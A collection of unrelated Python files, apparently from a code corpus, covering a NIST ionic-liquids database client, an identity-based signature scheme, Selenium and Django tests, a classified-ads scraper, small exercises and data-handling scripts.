class Container(containers.DeclarativeContainer):
# database_client = providers.Singleton(
# init_db,
# db_name='database.db',
# migrations_dir='repository/migrations'
# )
env = providers.Singleton(
Environment
)
event_hub = providers.Factory(
EventHub,
env = env
)
|
# -*- coding: utf-8 -*-
"""
This package contains object classes and functions to access the Ionic Liquids Database - ILThermo (v2.0)
from NIST (Standard Reference Database #147) within Python.
Concept
-------
The :func:`pyilt2.query` function uses the *requests* module to carry out the query on the NIST server.
The resulting *JSON* object is then decoded to a Python dictionary (:doc:`resDict <resdict>`), which serves as input
to create a :class:`pyilt2.result` object.
The result object creates and stores for each hit of the query a :class:`pyilt2.reference` object,
which offers the method :meth:`pyilt2.reference.get` to acquire the full data (:doc:`setDict <setdict>`)
as a :class:`pyilt2.dataset` object.
Variables
---------
To handle the "problem" with expressing the physical property in a programmatic sense,
there are following module variables accessible:
.. py:data:: prop2abr
A dictionary with long description as *key* and abbreviation as *value*, like::
{'Activity': 'a',
'Adiabatic compressibility': 'kS',
'Apparent enthalpy': 'Hap',
'Apparent molar heat capacity': 'capm',
...}
.. py:data:: abr2prop
Obvious the reversed version of :data:`prop2abr` ;)
.. py:data:: properties
.. deprecated:: 0.9.8
Use :data:`abr2prop` instead!
A dictionary where the *key* is an abbreviation and the *value* is a list containing the
NIST hash and a long description of the respective physical property::
{"a" : ["xuYB", "Activity"],
"phi" : ["GVwU", "Osmotic coefficient"],
"Xpeq" : ["DzMB", "Composition at phase equilibrium"],
"Xeut" : ["yfBw", "Eutectic composition"],
...}
.. py:data:: abr2key
This modified dictionary provides the translation between the abbreviation (dict's key)
of a physical property and the key (dict's value) as used in the http search request.
Because it already happened that the keys have changed,
we get those just in time of first usage by a http request.
It looks like::
{'Dself': 'wCtj',
'Dterm': 'LZlp',
'Dtrac': 'QJLO',
...}
If you don't intend to write your own :func:`query` function, there is no need to access this variable.
Classes & Functions
---------------------
"""
import requests
import numpy as np
from .proplist import prop2abr, abr2prop, abr2key, properties
from .version import __version__
__license__ = "MIT"
__docformat__ = 'reStructuredText'
searchUrl = "http://ilthermo.boulder.nist.gov/ILT2/ilsearch"
dataUrl = "http://ilthermo.boulder.nist.gov/ILT2/ilset"
def query(comp='', numOfComp=0, year='', author='', keywords='', prop=''):
""" Starts a query on the Ionic Liquids Database from NIST.
Each web form field is represented by a keyword argument.
To specify the physical property you have to use the respective :doc:`abbreviation <props>`.
The function returns a :class:`pyilt2.result` object, whether or not the query makes a hit.
:param comp: Chemical formula (case-sensitive), CAS registry number, or name (part or full)
:type comp: str
:param numOfComp: Number of mixture components. Default '0' means *any* number.
:type numOfComp: int
:param year: Publication year
:type year: str
:param author: Author's last name
:type author: str
:param keywords: Keyword(s)
:type keywords: str
:param prop: Physical property by abbreviation. Default '' means *unspecified*.
:return: result object
:rtype: :class:`pyilt2.result`
:raises pyilt2.propertyError: if the abbreviation for physical property is invalid
:raises pyilt2.queryError: if the database returns an Error on a query
"""
if prop:
if prop not in list(abr2prop.keys()):
raise propertyError(prop)
else:
# prp = properties[prop][0]
prp = abr2key[prop]
else:
prp = ''
params = dict(
cmp = comp,
ncmp = numOfComp,
year = year,
auth = author,
keyw = keywords,
prp = prp
)
r = requests.get(searchUrl, params=params)
resDict = r.json()
if len(resDict['errors']) > 0:
e = " *** ".join(resDict['errors'])
raise queryError(e)
return result(resDict)
class result(object):
""" Class to store query results.
The :class:`.result` object is created by the :func:`pyilt2.query` function.
Each hit of the query is represented by a :class:`pyilt2.reference` object.
The build-in function :func:`len` returns the number of hits, respectively
references stored in the result object.
It is iterable, so you can simply iterate over references, like:
.. code-block:: py
# iterate over references
for reference in result:
...
# One can also access the individual references as items:
first_reference = result[0]
last_reference = result[-1]
:param resDict: decoded JSON object
:type resDict: dict
"""
def __init__(self, resDict):
self._currentRefIndex = 0
#: original JSON object from NIST server decoded to a Python dictionary (:doc:`example <resdict>`)
self.resDict = resDict
# create reference objects
self.refs = []
for ref in self.resDict['res']:
ref = self._makeRefDict( ref )
self.refs.append( reference(ref) )
def __len__(self):
return len(self.refs)
def __iter__(self):
return self
def __next__(self):
if self._currentRefIndex < len(self):
out = self.refs[self._currentRefIndex]
self._currentRefIndex += 1
return out
self._currentRefIndex = 0
raise StopIteration()
def __getitem__(self, item):
return self.refs[item]
def _makeRefDict(self, refList):
out = {}
for i in range(0, len(refList)):
out[ self.resDict['header'][i] ] = refList[i]
return out
class reference(object):
""" Class to store a reference.
The :class:`.reference` objects will be created while initiating :class:`pyilt2.result` object.
It contains just a few meta data. To acquire the full data set, it offers the :meth:`pyilt2.reference.get` method.
:param refDict: part of ``resDict``
:type refDict: dict
"""
def __init__(self, refDict):
self.refDict = refDict
#: number of components as integer
self.numOfComp = 0
#: names of component names as list of strings
self.listOfComp = []
self._parseComp()
def __str__(self):
return self.ref
@property
def setid(self):
"""NIST setid (hash) as used as input for :class:`pyilt2.dataset`"""
return self.refDict['setid']
@property
def ref(self):
"""
Reference as in the result table on the website,
like ``Muster et al. (2018)``, ``Muster and Mann (2018)`` or ``Muster (2018a)``.
"""
return self.refDict['ref']
@property
def sref(self):
"""
Short reference, like ``MusterEtal2018``, ``MusterMann2018`` or ``Muster2018a``.
.. note::
We are very sure about this reference (as derived from :attr:`.ref`) is unique
within the database. Therefore it can be used as an identifier for a source (publication)
over multiple requests, for example as BibTeX reference.
"""
wds = self.ref.split()
year = wds[-1][1:-1]
if 'et al.' in self.ref:
return wds[0] + 'Etal' + year
elif 'and' in self.ref:
return wds[0] + wds[2] + year
else:
return wds[0] + year
@property
def year(self):
"""year of publication as integer"""
return int(self.ref.split()[-1][1:5])
@property
def author(self):
"""1st author’s last name"""
return self.ref.split()[0]
@property
def prop(self):
"""physical property"""
return self.refDict['prp'].strip()
@property
def np(self):
"""Number of data points"""
return int(self.refDict['np'])
def _parseComp(self):
for k in ['nm1','nm2','nm3']:
if self.refDict.get(k):
self.numOfComp += 1
self.listOfComp.append( self.refDict[k])
def get(self):
""" Returns the full data according to this reference.
:return: Dataset object
:rtype: :class:`pyilt2.dataset`
"""
return dataset(self.refDict['setid'])
class dataset(object):
""" Class to request & store the full data set.
The :class:`.dataset` object is created by the :meth:`pyilt2.reference.get` method.
:param setid: NIST setid (hash)
:type setid: str
:raises pyilt2.setIdError: if setid is invalid
"""
def __init__(self, setid):
#: NIST setid (hash) of this data set
self.setid = setid
#: original JSON object from NIST server decoded to a Python dictionary (:doc:`example <setdict>`)
self.setDict = {}
#: :class:`numpy.ndarray` containing the data points
self.data = np.array([])
#: List containing the **description** for each column of the data set
self.headerList = []
#: List containing the **physical property** for each column of the data set
self.physProps = []
#: List containing the **physical units** for each column of the data set
self.physUnits = []
#: List containing the phase information (if it make sense) for each column of the data set
self.phases = []
self._initBySetid()
self._dataNpArray()
self._dataHeader()
def _initBySetid(self):
r = requests.get(dataUrl, params=dict(set=self.setid))
# raise HTTPError
r.raise_for_status()
# check if response is empty
if r.text == '':
raise setIdError(self.setid)
self.setDict = r.json()
def _dataHeader(self):
headerList = self.setDict['dhead']
cnt = 0
for col in headerList:
prop = col[0].replace('<SUP>', '').replace('</SUP>', '')
if len(col) == 2:
phase = col[1]
else:
phase = None
if ',' in prop:
tmp = prop.split(',')
prop = ''.join(tmp[0:-1])
units = tmp[-1].strip()
else:
units = None
prop = prop.replace(' ', '_')
desc = prop
if phase:
desc = '{0:s}[{1:s}]'.format(prop, phase)
if units:
desc = '{0:s}/{1:s}'.format(desc, units)
self.headerList.append(desc)
self.physProps.append(prop)
self.physUnits.append(units)
self.phases.append(phase)
if self._incol[cnt] is 2:
self.headerList.append( 'Delta(prev)' )
self.physProps.append( 'Delta[{0:s}]'.format(prop) )
self.physUnits.append(units)
self.phases.append(phase)
cnt += 1
self.headerLine = ' '.join(self.headerList)
def _dataNpArray(self):
raw = self.setDict['data']
rows = len(raw)
self._incol = []
acols = 0
for c in raw[0]:
acols += len(c)
self._incol.append(len(c))
self.data = np.zeros((rows, acols))
for i in range(0, len(raw)):
newrow = [item for sublist in raw[i] for item in sublist]
for j in range(0, len(newrow)):
self.data[i][j] = newrow[j]
@property
def fullcite(self):
return '"{0:s}", {1:s}'.format(self.setDict['ref']['title'], self.setDict['ref']['full'])
@property
def shape(self):
"""Tuple of :py:attr:`.data` array dimensions."""
return self.data.shape
@property
def np(self):
"""Number of data points"""
return len(self.data)
@property
def listOfComp(self):
"""List of component names as strings."""
out = []
for comp in self.setDict['components']:
out.append( comp['name'] )
return out
@property
def numOfComp(self):
"""Number of components as integer."""
return len(self.setDict['components'])
def write(self, filename, fmt='%+1.8e', header=None):
"""
Writes the data set to a text file.
:param filename: output file name
:type filename: str
:param fmt: str or sequence of strs, (see `numpy.savetxt`_ doc)
:type fmt: str
:param header: String that will be written at the beginning of the file. (default from :attr:`.headerList`)
:type header: str
.. _numpy.savetxt: https://docs.scipy.org/doc/numpy/reference/generated/numpy.savetxt.html
"""
if not header:
header = self.headerLine
np.savetxt(filename, self.data, fmt=fmt, delimiter=' ',
newline='\n', header=header, comments='# ')
class queryError(Exception):
"""Exception if the database returns an Error on a query."""
def __init__(self,note):
self.msg = note
def __str__(self):
return repr(self.msg)
class propertyError(Exception):
"""Exception if an invalid abbreviation (for physical property) is defined."""
def __init__(self,prop):
self.msg = 'Invalid abbreviation "{0:s}" for physical property!'.format(prop)
def __str__(self):
return repr(self.msg)
class setIdError(Exception):
"""Exception if the set NIST setid (hash) is invalid.
Because the NIST web server still returns a HTTP status code 200,
even if the set id is invalid (I would expect here a 404er!),
this exception class was introduced.
"""
def __init__(self,setid):
self.msg = 'SetID "{0:s}" is unknown for NIST!'.format(setid)
def __str__(self):
return repr(self.msg)
|
'''David Naccache based Identity-Based Encryption
| From: "David Naccache Secure and Practical Identity-Based Encryption Section 4"
| Available from: http://eprint.iacr.org/2005/369.pdf
* type: encryption (identity-based)
* setting: bilinear groups (asymmetric)
:Authors: Gary Belvin
:Date: 06/2011
'''
from charm.toolbox.pairinggroup import PairingGroup,ZR,G1,G2,GT,pair
from charm.toolbox.PKSig import PKSig
from charm.toolbox.enum import Enum
from charm.toolbox.hash_module import Waters
import math
debug = False
class IBE_N04_Sig(PKSig):
"""
>>> from charm.toolbox.pairinggroup import PairingGroup
>>> group = PairingGroup('SS512')
>>> waters = Waters(group)
>>> ibe = IBE_N04_Sig(group)
>>> (public_key, secret_key) = ibe.keygen()
>>> ID = "bob@mail.com"
>>> msg = waters.hash("This is a test.")
>>> signature = ibe.sign(public_key, secret_key, msg)
>>> ibe.verify(public_key, msg, signature)
True
"""
"""Implementation of David Naccahe Identity Based Encryption"""
def __init__(self, groupObj):
PKSig.__init__(self)
#PKSig.setProperty(self, secdef='IND_ID_CPA', assumption='DBDH', secmodel='Standard')
#, other={'id':ZR}
#message_space=[GT, 'KEM']
global group
group = groupObj
def keygen(self, l=32):
'''l is the security parameter
with l = 32, and the hash function at 160 bits = n * l with n = 5'''
global waters
sha1_func, sha1_len = 'sha1', 20
g = group.random(G1) # generator for group G of prime order p
hLen = sha1_len * 8
n = int(math.floor(hLen / l))
waters = Waters(group, n, l, sha1_func)
alpha = group.random() #from Zp
g1 = g ** alpha # G1
g2 = group.random(G2) #G2
uprime = group.random(G2)
U = [group.random() for x in range(n)]
pk = {'g':g, 'g1':g1, 'g2': g2, 'uPrime':uprime, 'U': U,
'n':n, 'l':l, 'egg': pair(g, g2) ** alpha }
# mk = pk.copy()
mk = {'g':g, 'g1':g1, 'g2': g2, 'uPrime':uprime, 'U': U,
'n':n, 'l':l, 'egg': pair(g, g2) ** alpha }
mk['g2^alpha'] = g2 ** alpha #master secret
if debug:
print(mk)
return (pk, mk)
def sign(self, pk, sk, m):
'''v = (v1, .., vn) is an identity'''
r = group.random()
d1 = sk['uPrime']
for i in range(sk['n']):
d1 *= sk['U'][i] ** m[i]
d1 = sk['g2^alpha'] * (d1 ** r)
d2 = sk['g'] ** r
return {'d1': d1, 'd2':d2}
def verify(self, pk, msg, sig):
c3 = pk['uPrime']
for i in range(pk['n']):
c3 *= pk['U'][i] ** msg[i]
num = pair(pk['g'], sig['d1'])
dem = pair(sig['d2'], c3)
return pk['egg'] == num / dem
def main():
groupObj = PairingGroup('SS512')
ibe = IBE_N04_Sig(groupObj)
waters = Waters(group)
(pk, sk) = ibe.keygen()
# represents public identity
M = "bob@mail.com"
msg = waters.hash("This is a test.")
sig = ibe.sign(pk, sk, msg)
if debug:
print("original msg => '%s'" % M)
print("msg => '%s'" % msg)
print("sig => '%s'" % sig)
assert ibe.verify(pk, msg, sig), "Failed verification!"
if debug: print("Successful Verification!!! msg => '%s'" % msg)
if __name__ == '__main__':
debug = True
main()
|
import time
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver import Keys
from pages.base_page import BasePage
from utils.locators import ChatPageLocator
# Processing Functions
def message_sent_or_pending(label):
if label == 'Sent':
return 'Yes'
elif label == 'Delivered':
return 'Yes'
elif label == 'Read':
return 'Yes'
elif label == 'Pending':
return 'No'
def message_seen_or_not(label):
if label == 'Sent':
return 'Not Seen'
elif label == 'Delivered':
return 'Not Seen'
elif label == 'Read':
return 'Seen'
elif label == 'Pending':
return 'Not Seen'
class ChatPage(BasePage):
def __init__(self, driver):
self.locator = ChatPageLocator
super().__init__(driver)
def message_sent(self, message):
self.find_element(*self.locator.MESSAGE_BOX).send_keys(message + Keys.ENTER)
time.sleep(2)
def successful_send_message(self, message):
self.message_sent(message)
value = self.find_element(*self.locator.ITEM_LOC).get_attribute('area-label')
label = ''.join(value.split())
return message_sent_or_pending(label)
def message_seen_status(self, message):
self.message_sent(message)
value = self.find_element(*self.locator.ITEM_LOC).get_attribute('area-label')
label = ''.join(value.split())
return message_seen_or_not(label)
def whatsapp_logout_status(self):
try:
self.wait_element(*self.locator.MENU_ICON_XPATH).click()
time.sleep(2)
self.wait_element(*self.locator.LOGOUT_XPATH).click()
return 'Yes'
except (NoSuchElementException, Exception) as ec:
print(ec)
return 'No'
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
from urllib.request import urlopen
from urllib.parse import quote
from bs4 import BeautifulSoup
import sys, os, glob
from reportlab.platypus import SimpleDocTemplate
from reportlab.lib.pagesizes import A4, landscape
from utils import str2bool, make_url, parse_inputs, get_region
from item import Immobilier, Vehicule, General
from common import DEFAULT_LOCALISATIONS, DEFAULT_CATEGORIES, ALIAS_DEPARTMENT
def get_item(data, model):
items = data.find('section', class_="tabsContent block-white dontSwitch")
if items:
for link in items.findAll('a'):
item_url = "http:"+link.get('href')
item_page = urlopen(item_url)
item_data = BeautifulSoup(item_page.read(), "html.parser")
obj = model(item_url, item_data)
yield obj
else:
print("Pas d'annonce")
def browse(url, categories):
category = url.split('/')[3]
if category not in categories:
raise Exception("Wrong URL: category '%s' does not exist" % category)
model = eval(categories[category])
page = urlopen(url)
data = BeautifulSoup(page.read(), "html.parser")
if data.find('span', class_="total_page"):
url_page = "https:" + data.find("a", class_="element page static link-like", id="next")["href"]
nbr_page = int(data.find("span", class_="total_page").text)
page_all = b''
for i in range(1,nbr_page+1):
print("page "+str(i)+"/"+str(nbr_page))
url_current = url_page.replace("?o=2", "?o="+str(i))
page_current = urlopen(url_current).read()
page_all += page_current
data_all = BeautifulSoup(page_all, "html.parser")
return(get_item(data_all, model))
else:
return(get_item(data, model))
if __name__ == '__main__':
# Parse inputs
args = parse_inputs()
# Loop on define location
keys = list(DEFAULT_LOCALISATIONS.keys())
# begin pdf file
doc = SimpleDocTemplate(args.report_name,pagesize=landscape(A4))
story=[]
if(args.departement == -1):
for key in keys:
cp = key
ville = DEFAULT_LOCALISATIONS[key]
# Set URL if set unset nbr_piece
URL = make_url(ville, cp, args)
# Print current city and cp
print(ville + " " + cp)
# Loop on result for city
for item in browse(URL, DEFAULT_CATEGORIES):
try:
item.serialize(args.image)
story += item.save(doc, args)
print("-----")
except:
print(item.ad_number())
print("%s: %s" % (sys.exc_info()[0], sys.exc_info()[1]))
print("=====")
else:
cp = None
ville = None
# Set URL if set unset nbr_piece
URL = make_url(ville, cp, args)
# Print current city and cp
print("search on region " + get_region(args) +", department "+ALIAS_DEPARTMENT[args.departement])
# Loop on result for city
for item in browse(URL, DEFAULT_CATEGORIES):
try:
item.serialize(args.image)
story += item.save(doc, args)
print("-----")
except:
print(item.ad_number())
print("%s: %s" % (sys.exc_info()[0], sys.exc_info()[1]))
print("=====")
# close pdf file
doc.build(story)
# Delete img files
for f in glob.glob("*.jpg"):
os.remove(f)
|
import pytest
from tests.mocks import MockChannel
from tests.output_betterproto.import_service_input_message import (
RequestResponse,
TestStub,
)
@pytest.mark.asyncio
async def test_service_correctly_imports_reference_message():
mock_response = RequestResponse(value=10)
service = TestStub(MockChannel([mock_response]))
response = await service.do_thing(argument=1)
assert mock_response == response
@pytest.mark.asyncio
async def test_service_correctly_imports_reference_message_from_child_package():
mock_response = RequestResponse(value=10)
service = TestStub(MockChannel([mock_response]))
response = await service.do_thing2(child_argument=1)
assert mock_response == response
@pytest.mark.asyncio
async def test_service_correctly_imports_nested_reference():
mock_response = RequestResponse(value=10)
service = TestStub(MockChannel([mock_response]))
response = await service.do_thing3(nested_argument=1)
assert mock_response == response
|
class hand:
"""
models a poker hand
"""
def __init__(self):
self.hand = []
def deal_poker_hand(self, deck):
"""
this function adds 5 cards from the deck to the hand
:param deck: deck that cards are being drawn from
:return:
"""
for i in range(5):
self.hand.append(deck.drawCard())
@property
def what_is_it(self):
"""
evaluates the hand
:return: value of hand
"""
pairs = []
triples = []
values = sorted([card.value for card in self.hand])
suits = [card.suit for card in self.hand]
for v in set(values):
if values.count(v) == 4:
return "4 of a kind"
if values.count(v) == 3:
triples.append(v)
if values.count(v) == 2:
pairs.append(v)
if all(s == suits[0] for s in suits):
return "Flush"
if len(triples) == 1 and len(pairs) == 1:
return "Full House"
if len(triples) == 1 and len(pairs) == 0:
return "3 of a kind"
if len(pairs) == 2:
return "2 pair"
if len(pairs) == 1:
return "1 pair"
else:
return "High card"
def print_hand(self):
"""
prints all cards in hand
:return: none
"""
for card in self.hand:
card.printCard()
|
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 24 12:05:17 2015
@author: HSH
"""
class Interval(object):
def __init__(self, s=0, e=0):
self.start = s
self.end = e
class Solution(object):
def insert(self, intervals, newInterval):
"""
:type intervals: List[Interval]
:type newInterval: Interval
:rtype: List[Interval]
"""
result = []
isInsert = False
for i in range(len(intervals)):
# newInterval already inserted
if isInsert:
result.append(intervals[i])
continue
# insert newInterval before current interval
if newInterval.end < intervals[i].start:
result.append(newInterval)
result.append(intervals[i])
isInsert = True
continue
# combine newInterval with current interval
if newInterval.start <= intervals[i].end:
newInterval.start = min(newInterval.start, intervals[i].start)
newInterval.end = max(newInterval.end, intervals[i].end)
continue
result.append(intervals[i])
if not isInsert:
result.append(newInterval)
return result
|
import math,string
import numpy as np
import time
import __builtin__
#
# MATLAB-like tic/toc for convenience
#
_tics = {None: 0.0}
def tic(id=None):
global _tics
now = time.time()
_tics[id] = now
return now
def toc(id=None):
global _tics
now = time.time()
return now - _tics[id]
##################################################
_int2dtype = { 0 : np.bool,
1 : np.int8,
2 : np.uint8,
3 : np.int16,
4 : np.uint16,
5 : np.int32,
6 : np.uint32,
7 : np.int64,
8 : np.uint64,
9 : np.float32,
10: np.float64 }
_dtype2int = { np.bool : 0,
np.int8 : 1,
np.uint8 : 2,
np.int16 : 3,
np.uint16 : 4,
np.int32 : 5,
np.uint32 : 6,
np.int64 : 7,
np.uint64 : 8,
np.float32 : 9,
np.float64 : 10 }
_arg2dtype = { "bool" : np.bool, np.dtype('bool') : np.bool, np.bool : np.bool, __builtin__.bool : np.bool,
"int8" : np.int8, np.dtype('int8') : np.int8, np.int8 : np.int8, __builtin__.chr : np.int8,
"uint8" : np.uint8, np.dtype('uint8') : np.uint8, np.uint8 : np.uint8,
"int16" : np.int16, np.dtype('int16') : np.int16, np.int16 : np.int16,
"uint16" : np.uint16, np.dtype('uint16') : np.uint16, np.uint16 : np.uint16,
"int32" : np.int32, np.dtype('int32') : np.int32, np.int32 : np.int32, __builtin__.int : np.int32,
"uint32" : np.uint32, np.dtype('uint32') : np.uint32, np.uint32 : np.uint32,
"int64" : np.int64, np.dtype('int64') : np.int64, np.int64 : np.int64, __builtin__.long : np.int64,
"uint64" : np.uint64, np.dtype('uint64') : np.uint64, np.uint64 : np.uint64,
"float32": np.float32, np.dtype('float32'): np.float32, np.float32: np.float32,
"float64": np.float64, np.dtype('float64'): np.float64, np.float64: np.float64, __builtin__.float: np.float64 }
# copied from http://code.activestate.com/recipes/578323-human-readable-filememory-sizes-v2/
def format_bytecount(val,fmt=".2cM"):
""" define a size class to allow custom formatting
format specifiers supported :
em : formats the size as bits in IEC format i.e. 1024 bits (128 bytes) = 1Kib
eM : formats the size as Bytes in IEC format i.e. 1024 bytes = 1KiB
sm : formats the size as bits in SI format i.e. 1000 bits = 1kb
sM : formats the size as bytes in SI format i.e. 1000 bytes = 1KB
cm : format the size as bit in the common format i.e. 1024 bits (128 bytes) = 1Kb
cM : format the size as bytes in the common format i.e. 1024 bytes = 1KB
"""
if val == 0:
return "0"
# work out the scale, suffix and base
factor, suffix = (8, "b") if fmt[-1] in string.lowercase else (1,"B")
base = 1024 if fmt[-2] in ["e","c"] else 1000
# Add the i for the IEC format
suffix = "i"+ suffix if fmt[-2] == "e" else suffix
mult = ["","K","M","G","T","P"]
val = float(val) * factor
i = 0 if val < 1 else int(math.log(val, base))+1
v = val / math.pow(base,i)
v,i = (v,i) if v > 0.5 else (v*base,i-1)
# Identify if there is a width and extract it
width = "" if fmt.find(".") == -1 else fmt[:fmt.index(".")]
precis = fmt[:-2] if width == "" else fmt[fmt.index("."):-2]
# do the precision bit first, so width/alignment works with the suffix
t = ("{0:{1}f}"+mult[i]+suffix).format(v, precis)
return "{0:{1}}".format(t,width) if width != "" else t
|
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
import sys
class FunctionalTest(StaticLiveServerTestCase):
@classmethod
def setUpClass(cls):
for arg in sys.argv:
if 'liveserver' in arg:
cls.server_url = 'http://' + arg.split('=')[1]
return
super().setUpClass()
cls.server_url = cls.live_server_url
@classmethod
def tearDownClass(cls):
if cls.server_url == cls.live_server_url:
super().tearDownClass()
def wait(self, locator):
return WebDriverWait(self.browser, 10).until(EC.presence_of_element_located(locator))
def setUp(self):
self.browser = webdriver.Chrome()
def tearDown(self):
self.browser.quit()
def check_for_row_in_list_table(self, row_text):
self.wait((By.CSS_SELECTOR, "#id_list_table tr"))
rows = self.browser.find_elements_by_css_selector("#id_list_table tr")
self.assertIn(row_text, [row.text for row in rows])
def get_item_input_box(self):
return self.wait((By.ID, 'id_text'))
|
#Create Pandas dataframe from the DarkSage output G['']
import pandas as pd
import numpy as np
# This is a way to converte multi dimensional data into pd.Series and then load these into the pandas dataframe
Pos = []
for p in G['Pos']:
Pos.append(p)
Pos_df = pd.Series(Pos, dtype=np.dtype("object"))
Vel = []
for v in G['Vel']:
Vel.append(v)
Vel_df = pd.Series(Vel, dtype=np.dtype("object"))
Spin = []
for s in G['Spin']:
Spin.append(s)
Spin_df = pd.Series(Spin, dtype=np.dtype("object"))
Disc_r = []
for d in G['DiscRadii']:
Disc_r.append(d)
Disc_df = pd.Series(Disc_r, dtype=np.dtype("object"))
Disc_gas = []
for g in G['DiscGas']:
Disc_gas.append(g)
Disc_gas_df = pd.Series(Disc_gas, dtype=np.dtype("object"))
Disc_stars = []
for g in G['DiscStars']:
Disc_stars.append(g)
Disc_stars_df = pd.Series(Disc_stars, dtype=np.dtype("object"))
SpinStars = []
for g in G['SpinStars']:
SpinStars.append(g)
SpinStars_df = pd.Series(SpinStars, dtype=np.dtype("object"))
SpinGas = []
for g in G['SpinGas']:
SpinGas.append(g)
SpinGas_df = pd.Series(SpinGas , dtype=np.dtype("object"))
SpinClassicalBulge = []
for g in G['SpinClassicalBulge']:
SpinClassicalBulge.append(g)
SpinClassicalBulge_df = pd.Series(SpinClassicalBulge, dtype=np.dtype("object"))
DiscHI = []
for g in G['DiscHI']:
DiscHI.append(g)
DiscHI_df = pd.Series(DiscHI, dtype=np.dtype("object"))
DiscH2 = []
for g in G['DiscH2']:
DiscH2.append(g)
DiscH2_df = pd.Series(DiscH2, dtype=np.dtype("object"))
DiscSFR = []
for g in G['DiscSFR']:
DiscSFR.append(g)
DiscSFR_df = pd.Series(DiscSFR, dtype=np.dtype("object"))
DiscGasMetals = []
for g in G['DiscGasMetals']:
DiscGasMetals.append(g)
DiscGasMetals_df = pd.Series(DiscGasMetals, dtype=np.dtype("object"))
DiscStarsMetals = []
for g in G['DiscStarsMetals']:
DiscStarsMetals.append(g)
DiscStarsMetals_df = pd.Series(DiscStarsMetals, dtype=np.dtype("object"))
######################################
DS = pd.DataFrame({'Type' : G['Type' ],
'GalaxyIndex' : G['GalaxyIndex' ],
'HaloIndex' : G['HaloIndex' ],
'SimulationHaloIndex' : G['SimulationHaloIndex' ],
'TreeIndex' : G['TreeIndex' ],
'SnapNum' : G['SnapNum' ],
'CentralGalaxyIndex' : G['CentralGalaxyIndex' ],
'CentralMvir' : G['CentralMvir' ],
'mergeType' : G['mergeType' ],
'mergeIntoID' : G['mergeIntoID' ],
'mergeIntoSnapNum' : G['mergeIntoSnapNum' ],
'dT' : G['dT' ],
'Pos' : Pos_df,
'Vel' : Vel_df ,
'Spin' : Spin_df ,
'Len' : G['Len' ],
'LenMax' : G['LenMax' ],
'Mvir' : G['Mvir' ],
'Rvir' : G['Rvir' ],
'Vvir' : G['Vvir' ],
'Vmax' : G['Vmax' ],
'VelDisp' : G['VelDisp' ],
'DiscRadii' : Disc_df,
'ColdGas' : G['ColdGas' ],
'StellarMass' : G['StellarMass' ],
'MergerBulgeMass' : G['MergerBulgeMass' ],
'InstabilityBulgeMass' : G['InstabilityBulgeMass' ],
'HotGas' : G['HotGas' ],
'EjectedMass' : G['EjectedMass' ],
'BlackHoleMass' : G['BlackHoleMass' ],
'IntraClusterStars' : G['IntraClusterStars' ],
'DiscGas' : Disc_gas_df,
'DiscStars' : Disc_stars_df,
'SpinStars' : SpinStars_df,
'SpinGas' : SpinGas_df,
'SpinClassicalBulge' : SpinClassicalBulge_df,
'StarsInSitu' : G['StarsInSitu' ],
'StarsInstability' : G['StarsInstability' ],
'StarsMergeBurst' : G['StarsMergeBurst' ],
'DiscHI' : DiscHI_df,
'DiscH2' : DiscH2_df,
'DiscSFR' : DiscSFR_df,
'MetalsColdGas' : G['MetalsColdGas' ],
'MetalsStellarMass' : G['MetalsStellarMass' ],
'ClassicalMetalsBulgeMass' : G['ClassicalMetalsBulgeMass' ],
'SecularMetalsBulgeMass' : G['SecularMetalsBulgeMass' ],
'MetalsHotGas' : G['MetalsHotGas' ],
'MetalsEjectedMass' : G['MetalsEjectedMass' ],
'MetalsIntraClusterStars' : G['MetalsIntraClusterStars' ],
'DiscGasMetals' : DiscGasMetals_df,
'DiscStarsMetals' : DiscStarsMetals_df,
'SfrFromH2' : G['SfrFromH2' ],
'SfrInstab' : G['SfrInstab' ],
'SfrMergeBurst' : G['SfrMergeBurst' ],
'SfrDiskZ' : G['SfrDiskZ' ],
'SfrBulgeZ' : G['SfrBulgeZ' ],
'DiskScaleRadius' : G['DiskScaleRadius' ],
'CoolScaleRadius' : G['CoolScaleRadius' ],
'StellarDiscScaleRadius' : G['StellarDiscScaleRadius' ],
'Cooling' : G['Cooling' ],
'Heating' : G['Heating' ],
'LastMajorMerger' : G['LastMajorMerger' ],
'LastMinorMerger' : G['LastMinorMerger' ],
'OutflowRate' : G['OutflowRate' ],
'infallMvir' : G['infallMvir' ],
'infallVvir' : G['infallVvir' ],
'infallVmax' : G['infallVmax' ]})
|
# -*- coding: utf-8 -*-
num=int(input())
sum=1
for i in range(1,num+1):
sum=sum*i
print(sum)
|
# File: hw3_part4.py
# Author: Joel Okpara
# Date: 2/21/2016
# Section: 04
# E-mail: joelo1@umbc.edu
# Description: This program takes a tempurature from the user
# and calculates the state of water at that temperature
def main():
# The Freezing point in celsius is 0 degrees
# The Boiling point in celcius is 100 degrees
# The Freezing point in Farenheit is 32 degrees
# The Boiling piong in Farenheit is 212 degrees
temperature = float(input("Please enter the temperature"))
scale = input("Please enter 'c' for Celcius, or 'f' for Farenheit")
if scale != "c" and scale != "f":
print("Your input must be 'C' or 'F'!")
#Does celsius calculations
if scale == "c":
if temperature <= 0:
print("At this temperature, water is a solid")
elif temperature > 0 and temperature < 100:
print("At this temperature, water is a liquid")
else:
print("At this temperature, water is a gas")
#does farenheit calculations
elif scale == "f":
if temperature <= 32:
print("At this temperature, water is a solid")
elif temperature > 32 and temperature < 212:
print("At this temperature, water is a liquid")
else:
print("At this temperature, water is a gas")
main()
|
from django.contrib import admin
from .models import Dog, Breed
# Register your models here.
@admin.register(Dog)
class DogAdmin(admin.ModelAdmin):
list_display = ('name', 'age', 'breed', 'gender', 'color')
search_fields = ('name',)
@admin.register(Breed)
class Breed(admin.ModelAdmin):
list_display = ('name', 'size')
|
from django.contrib.sites.models import Site
from django.db import models
from django.utils.translation import ugettext_lazy as _
class SiteSettings(models.Model):
site = models.OneToOneField(Site, related_name='settings')
class Meta:
verbose_name = _(u'site settings')
verbose_name_plural = _(u'site settings')
|
# Generated by Django 2.2.13 on 2020-07-08 16:22
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('product', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='category',
old_name='title',
new_name='titlec',
),
]
|
from elasticsearch import Elasticsearch
import json
if __name__ == "__main__":
app_name_set = set()
es_client = Elasticsearch(['localhost:9200'])
index='topic'
